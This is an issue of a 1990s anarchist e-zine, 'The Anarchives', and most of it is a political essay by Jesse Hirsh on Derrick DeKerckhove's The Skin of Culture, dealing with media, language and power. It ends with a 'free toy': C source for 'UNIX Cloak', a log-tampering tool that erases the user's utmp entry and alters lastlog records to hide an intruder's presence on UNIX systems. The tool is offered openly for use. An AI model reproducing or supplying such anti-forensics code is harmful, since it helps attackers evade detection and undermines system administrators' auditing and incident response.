Subject: The Anarchives... Power & Language

		"Those not busy being born, are busy dying"
The Anarchives 				Volume 2 Issue 5
	The Anarchives			Published By
		The Anarchives		The Anarchy Organization
			The Anarchives	jterpstra@trentu.ca

		Send your e-mail address to get on the list
		Spread The Word Pass This On...

               --/\--			Language & Power
             /  /  \  \			The Emerging Political
         ---|--/----\--|---		Technological Environment
             \/      \/			
             /\______/\			by Jesse Hirsh

	_________________		A study of Derrick DeKerckhove's
	|Free Toy Inside|		The Skin Of Culture
	^^^^^^^^^^^^^^^^^
__-___---___---___---___---___-----_____-------_______-------_____----_____
There is a theory which states that if ever anyone discovers
  exactly what the Universe is for and why it is here, it will
instantly disappear and be replaced by something even more
  bizarrely inexeplicable.
There is another theory which states that this has already happened.
_____-------______--------_______-------_______---
                           oooo$$$$$$$$$$$$oooo
                       oo$$$$$$$$$$$$$$$$$$$$$$$$o
                    oo$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$o         o$   $$ o$
    o $ oo        o$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$o       $$ $$ $$o$
 oo $ $ "$      o$$$$$$$$$    $$$$$$$$$$$$$    $$$$$$$$$o       $$$o$$o$
 "$$$$$$o$     o$$$$$$$$$      $$$$$$$$$$$      $$$$$$$$$$o    $$$$$$$$
   $$$$$$$    $$$$$$$$$$$      $$$$$$$$$$$      $$$$$$$$$$$$$$$$$$$$$$$
   $$$$$$$$$$$$$$$$$$$$$$$    $$$$$$$$$$$$$    $$$$$$$$$$$$$$  """$$$
    "$$$""""$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$     "$$$
     $$$   o$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$     "$$$o
    o$$"   $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$       $$$o
    $$$    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$" "$$$$$$ooooo$$$$o
   o$$$oooo$$$$$  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$   o$$$$$$$$$$$$$$$$$
   $$$$$$$$"$$$$   $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$     $$$$""""""""
  """"       $$$$    "$$$$$$$$$$$$$$$$$$$$$$$$$$$$"      o$$$
             "$$$o     """$$$$$$$$$$$$$$$$$$"$$"         $$$
               $$$o          "$$""$$$$$$""""           o$$$
                $$$$o                                o$$$"
                 "$$$$o      o$$$$$$o"$$$$o        o$$$$
                   "$$$$$oo     ""$$$$o$$$$$o   o$$$$""
                      ""$$$$$oooo  "$$$o$$$$$$$$$"""
                         ""$$$$$$$oo $$$$$$$$$$
                                 """"$$$$$$$$$$$      PThhHHhhBT!!!
                                     $$$$$$$$$$$$
                                      $$$$$$$$$$"
                                       "$$$""""
	Evolution of the language accompanies dramatic transformative
change. New concepts explode into all areas as the playing field
is continuously redrawn into the playing being. Ideas are
liberated, often accompanied by the liberation of language.
	Language is a dominant influence in the development of culture.
The medium of language is concentrated information, carrying its
own digital codes that can be cracked.
	Marshall McLuhan, Noam Chomsky, and Derrick DeKerckhove are all
students of language. The attain an understanding of "reality"
through a comprehension of words, in addition of course to the
many other extensions of humanity. All of these guys can claim a
large area of study as their "turf"; language and media are
everywhere.
	They are the totalitarian theorists of the late millennium.
	They study the total media environments of the information age,
or as DeKerckhove says, "The Age Of Mind". This is now the Age
Of Mind; the information age.
	When their three perspectives are brought together a portrait
emerges of a planet in synesthesia; man, machine, and nature
fused into a single entity; a living planet; spaceship earth.
The nature of this synesthesia is total domination; an all
enveloping process of change directed at the consolidation and
total centralization of power. The state continues its
historical evolution of conquest, transforming as it
revolutionizes the means of booty.

Aiight, that was the quick intro. Buckle up 'cause we now go
into the study of The Skin Of Culture by Derrick DeKerckhove,
continuing TAO's study of the so-called revolution. It's gonna
be heavy, so buckle up and prepare for download. I and I are
going for a fantastic voyage.

"When people buy these systems, they are not buying services,
not even status; they are buying power." (DeKerckhove, pp. 95)

	The world is a stage; an arena of political competition in
which survival has been equated with success and getting ahead
is the only alternative to falling behind.
	Information technology is an enabling technology; it empowers
the user with new abilities, with greater tools to accomplish
greater tasks.
	It also plays the role of bond within a global institution;
tying together millions, extending power outward, allowing it to
fully integrate and proliferate. The liberation of information.

"Relationships of ownership; they whisper in the wings
To those condemned to act accordingly and wait for succeeding
kings"
(Bob Dylan 1965)

	Technological turnover however is not driven by equitable
development, rather dictated by profit motives in tandem with
social control. Technological dependency quickly ensues as the
degree and rate of technological turnover is controlled.

"Moving at very high speeds, technology itself controls the
marketplace and, hence, culture. There used to be a time when
history was reality; today reality is in great danger of
becoming history. Right now, Nintendo tunes the nervous systems
of generations exposed more frequently to computers than to
television screens. While they are playing, our kids are turned
into hapless extensions of their Nintendos and Segas, as if they
were complex, organic servomechanism of crude joysticks and
digital video cartoons. That's another image of our new selves
growing up." (DeKerckhove, pp. 173)

	The Age of Mind represents the formation of monstrous power.
Power of an unimaginable magnitude.
	Power is at the core of the entire technological change; media
is an inherent source of political power and political
organization. The new media represent the evolution of power;
the implosion of empire as a means of imperial growth.
	We all feel this change instinctively; but a consciousness of
it does not yet fully exist. Many are lost in the wilderness of
advanced urbanization; isolated suburbanites vulnerable to the
reactionaries of tele-democracy; lost in artificial realities in
an artificial environment. Synthetic conscious permeates a
living institution of power.

"the power to redesign what we call 'reality'." (DeKerckhove,
pp. 176)

	The merger between human and machine, individual and
institution, is an expression of the forces of creation.
Synthesis empowers as it creates.

"After decades of being hostages to the industrial-military
complex, we are threatened with a new kind of seizure of the
body-politic, that of the industrial-medical complex."
(DeKerckhove, pp. 84)

	The industrial-military complex does not dissolve, rather it
matures and evolves. It embraces the politics of inclusion,
absorbing all within its structure. What began in the fifties
and sixties with the full integration of military and industry
into the perpetual war economy, now becomes the full integration
of the psychological and biological extensions of the same
institution. 

"Over 25 percent of the economy in almost all of the advanced
information states is founded on arms manufacturing and/or
distribution." (DeKerckhove, pp. 188)

	The media created and enacted by the traditional institutions
of war and booty, the imperial powers, transformed the
institutions, dictating their courses of evolution. Although the
growth of the institutions may not have been explicitly
directed, they were centred upon embedded principles of power
and wealth. Control within the expanding empire had to be
ensured and developed in tandem with the institution itself.

"Our one-way, frontal relationship with the tv screen ushered in
mass culture. The computer screen, introducing two-way
interactive modalities, added speed. The effect of integrated
hypermedia will be total immersion. We are at the brink of a new
depth culture which is now taking shape during the nineties.
Every time the emphasis on a given medium changes, the whole
culture shifts." (DeKerckhove, pp. 123)

	With the new technologies, and the accompanied liberation of
information, imperial growth goes quantum. The technology
creates new dimensions for growth, exploitation, and profit. Its
totality ensures its success, and its success is dependent upon
its totality. Its reach must be universal.

"... the progress of virtual reality is relentless and it will
eventually take over the economy - just as television once did -
because it stimulates the convergence of market pressures and
growing psychological needs." (DeKerckhove, pp. 93)

	There are no limits to its reach, its reach is everywhere. As
we extend from ourselves, it extends into us. The relationship
between human and media becomes one of domination as the
extensions become conscious and gain lives of their own, donated
by willing consumers, intoxicated by the seducing effects of
technological power.

"Three levels of integration:
1. Inner. Hyper-concentration and acceleration of computing
power.
2. Outer. Standardization for international telecommunication
networks.
3. Interactive. Biological interactivity between humans and
machine in virtual reality."
(DeKerckhove, pp. 39)

	The entire process is subtle by nature. Inconspicousness as an
inherent characteristic.

"Computer screens established an interface between biological
and technological electricity, between the user and the
networks." (DeKerckhove, pp. 125)

	Critical thinking has traditionally been discouraged if not
repressed. Consciousness of the existence and implications of
such a total institution is perhaps directly subversive to the
dominant mind set. It operates as a runaway train; set in its
motion by the few, uniting the fates of all. Hurtling through
space on a makeshift space ship.

"Add to such a possibility that of touching the object of
perception and modifying it, in selected ways ruled by selected
routines, and you will eventually get the most powerful thinking
machine ever devised: a think tank where the thought is the
tank." (DeKerckhove, pp. 49)
"a single global computer" (DeKerckhove, pp. 63)

	Thought and action converging into one. Our skin is the hull,
and our brain is the central computer. Collectively we
participate in the new model of social organization. The global
leviathan awakens, a metamorphosis of global synesthesia and
simultaneous communication.

"Electricity is the new common language." (DeKerckhove, pp. 82)

	Electricity is the new blood of the nation. Our arteries (James
Bay) are tapped through veins and nerves (cancer 'causin hydro
lines) to give to life and energy to our body. We become the
beacons of information travelling through the body, relaying
bits of information for bits of information, ensuring that body
operates effectively.
	The operation of the body is controlled by the brain. The
collection of information by a myriad of centres that determine
the actions within and by the body. The ties that bond, the
extensions of the brain, hold the body together in a resonating
symphony of creation and life. An organic order. 

"Electricity surrounds the globe in a single mesh."
(DeKerckhove, pp. 137)

	Within the brain of course there are dominant areas that have
significantly larger influence over the body and the operation
of the brain than others.
	You know there's an elite jack. Within a global organic
institution the elite, for reasons of survival, wield power in a
conservative effort to maintain order. Presented with the
dynamic and total powers of the leviathan an elite can enact an
age of transformative change accompanied by the exponential
growth of the all encompassing organic institution.
	Order is maintained while revolution reverberates throughout.
Apathy and passivity; disenfranchisement and exclusion; enacting
an absence of real political participation. Suffrage is
maintained, and responsible governance represents the total
inclusion of all in the cost of order.

"The integration of television and other news media within
computer networks enables polling engineers to reduce the time
interval between question and answer, between action and
reaction. The potential for manipulating opinions, in such
conditions, is greatly amplified. This has many social and
political repercussions.
Increasingly, the politicians of western-style democracies owe
their power base to meticulous computerized analyses of public
opinion in any given arena. Campaign managers tailor their
responses in locally appropriate media. During political
campaigns the world over, tv stuffs its images into the
electors' consciousness presented as statistical facts. All this
is supposed to help you make up your mind. But when television
and computers are integrated in a single feedback loop on urgent
issues, that mind is made up for you. Your own mind may hardly
be involved at all.
It is one thing for polls to reflect, as accurately as possible,
the opinions of a given community. It is quite another for the
same polls to shape opinions, or present opinions which weren't
there before. This is psychotechnology in action. Polls and
statistics have a homogenizing effect on public opinion because
they highlight, and thus promote, majority responses over
dissent. In a culture where the means of making up one's mind
are given less weight and time than those which make up the
collective mind, it is easier to let the majority hold sway.
This is one of the trade-offs between book and television
culture." (DeKerckhove, pp. 211)

	ok lets stop here for a moment. this is the end of part one.
part two will deal explicitly with the leviathan, the organic
institution of global order, and the manufacturing of consent,
the programming of culture, you know the politics of
psychological domination.
	sometimes when i and i stop and read over a sentence or come
out of some deep thought i and i kind of reflect on what exactly
i and i'm saying, and usually at that point i and i gotta hold
on to something.
	sometimes in the healing process you're not always aware of the
actions your subconscious is bidding you to take. i and i've
been turned on to some crazy-assed theories on media and
society, and they need to be explored. What are the secrets to
be found in our language?

Thanx for making it to the end; here's your free toy:

/* UNIX Cloak v1.0 (alpha)  Written by: Wintermute of -Resist- */
/* This file totally wipes all presence of you on a UNIX system*/
/* It works on SCO, BSD, Ultrix, HP/UX, and anything else that */
/* is compatible..  This file is for information purposes ONLY!*/

/*--> Begin source...    */
#include <fcntl.h>
#include <utmp.h>
#include <sys/types.h>
#include <unistd.h>
#include <lastlog.h>

main(argc, argv)
    int     argc;
    char    *argv[];
{
    char    *name;
    struct utmp u;
    struct lastlog l;
    int     fd;
    int     i = 0;
    int     done = 0;
    int     size;

    if (argc != 1) {
         if (argc >= 1 && strcmp(argv[1], "cloakme") == 0) {
	     printf("You are now cloaked\n");
	     goto start;
                                                           }
         else {
	      printf("close successful\n");
	      exit(0);
	      }
		   }
    else {
	 printf("usage: close [file to close]\n");
	 exit(1);
	 }
start:
    name = (char *)(ttyname(0)+5);
    size = sizeof(struct utmp);

    fd = open("/etc/utmp", O_RDWR);
    if (fd < 0)
	perror("/etc/utmp");
    else {
	while ((read(fd, &u, size) == size) && !done) {
	    if (!strcmp(u.ut_line, name)) {
		done = 1;
		memset(&u, 0, size);
		lseek(fd, -1*size, SEEK_CUR);
		write(fd, &u, size);
		close(fd);
	    }
	}
    }


    size = sizeof(struct lastlog);
    fd = open("/var/adm/lastlog", O_RDWR);
    if (fd < 0)
	perror("/var/adm/lastlog");
    else {
	lseek(fd, size*getuid(), SEEK_SET);
	read(fd, &l, size);
	l.ll_time = 0;
	strncpy(l.ll_line, "ttyq2 ", 5);
	gethostname(l.ll_host, 16);
	lseek(fd, size*getuid(), SEEK_SET);
	close(fd);
    }
}

TAO brings wings of love

